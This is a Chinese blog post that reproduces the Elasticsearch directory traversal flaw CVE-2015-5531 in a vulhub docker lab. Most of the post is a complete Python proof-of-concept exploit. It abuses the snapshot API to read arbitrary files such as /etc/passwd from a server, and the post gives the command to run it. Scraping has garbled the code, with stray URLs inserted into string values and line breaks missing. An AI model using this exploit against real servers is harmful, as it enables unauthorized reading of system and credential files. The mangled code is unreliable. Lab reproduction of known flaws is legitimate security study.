声明 好好学习,天天向上
漏洞描述 【WEB安全|ElasticSearch 目录穿越漏洞(CVE-2015-5531)】elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。
影响范围 1.6.1以下
复现过程 这里使用v1.6.0版本
使用vulhub
cd /app/vulhub-master/elasticsearch/CVE-2015-5531
使用docker启动
docker-compose up -d
环境启动后,访问http://your-ip:9200
http://192.168.239.129:9200
直接上POC,cve-2015-5331.py,内容如下(不需要修改)
#!/usr/bin/env python
# PoC for CVE-2015-5531 - Reported by Benjamin Smith
# Affects ElasticSearch 1.6.0 and prior
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Jose A. Guasch || twitter: @SecByDefault || jaguasch at gmail.com
# Tested on default Linux (.deb) install || requires path.repo: to be set on config fileimport urllib, urllib2, json, sys, reprint "!dSR script for CVE-2015-5531\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()host = sys.argv[1]
fpath = urllib.quote(sys.argv[2], safe='')
port = 9200
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
reponame = 'pwn'
baseurl = "http://%s:%s/_snapshot/" % (host, port)
xplurl = '%s%s/%s%s' % (baseurl, reponame, trav, fpath)def createSnapdirs():
try:
url = "%s/%s" % (baseurl, reponame)
request = urllib2.Request(url, data='https://www.it610.com/article/{"type":"fs","settings":{"location":"dsr"}}')
request.get_method = lambda: 'POST'
urllib2.urlopen(request)url = "%s/%sie" % (baseurl, reponame)
request = urllib2.Request(url, data='https://www.it610.com/article/{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}')
request.get_method = lambda: 'POST'
urllib2.urlopen(request)
except urllib2.HTTPError, e:
data = https://www.it610.com/article/json.load(e)
print"[!] ERROR: Verify path.repo exist in config file, elasticsearch.yml:\n"
print str(data['error'])
sys.exit()def grabFile(xplurl):
try:
urllib2.urlopen(xplurl)
except urllib2.HTTPError, e:
data = https://www.it610.com/article/json.load(e)
extrdata = re.findall(r'\d+', str(data['error']))
decoder = bytearray()
for i in extrdata[+2:]:
decoder.append(int(i))
print decoderdef main():
createSnapdirs()
grabFile(xplurl)if __name__ == "__main__":
main()
执行命令(IP自己改)
python cve-2015-5331.py 192.168.239.129 /etc/passwd
文章图片
关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令 拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down
推荐阅读
- WEB安全|Apache Solr 远程命令执行漏洞(CVE-2017-12629)
- elasticsearch|Elasticsearch-27.数据建模实例he数据建模最佳实践
- 网络安全|网络安全kali渗透学习 web渗透入门 使用WireShark对常用协议抓包
- Python中如何实现密码验证(两种方法)
- MD5和SHA1之间有什么区别(详细介绍)
- elasticsearch|Elasticsearch-14.搜索的相关性算分和Query & Filtering 与多字符串多字段查询
- elasticsearch|Elasticsearch-18.综合排序:Function Score Query 优化算分和Term&PhraseSuggester
- elasticsearch|Elasticsearch-19.自动补全与基于上下文的提示与跨集群搜索和跨集群搜索
- 中间件|(ElasticSearch02)day80分布式查漏补缺